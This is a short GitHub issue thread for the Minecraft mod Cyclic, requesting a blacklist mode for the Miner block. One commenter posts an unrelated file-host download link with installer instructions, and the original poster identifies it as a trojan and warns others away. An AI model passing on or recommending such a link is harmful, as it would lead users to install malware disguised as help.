### ISSUE TITLE
(suggestion) Blacklist mode for Miner

### ISSUE THREAD

**Issue by uhloin** [PrinceOfAmber/Cyclic#2432]
Minecraft Version: 1.20.1

It would be good to have blacklist mode for Miner and Block state Card, because convenient way for use it is mine all useful EXCEPT Stone, Deepslate and Dirt or like this.

**Comment by Deepak78987** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by uhloin** [comment]
It's trojan above, do not use it!
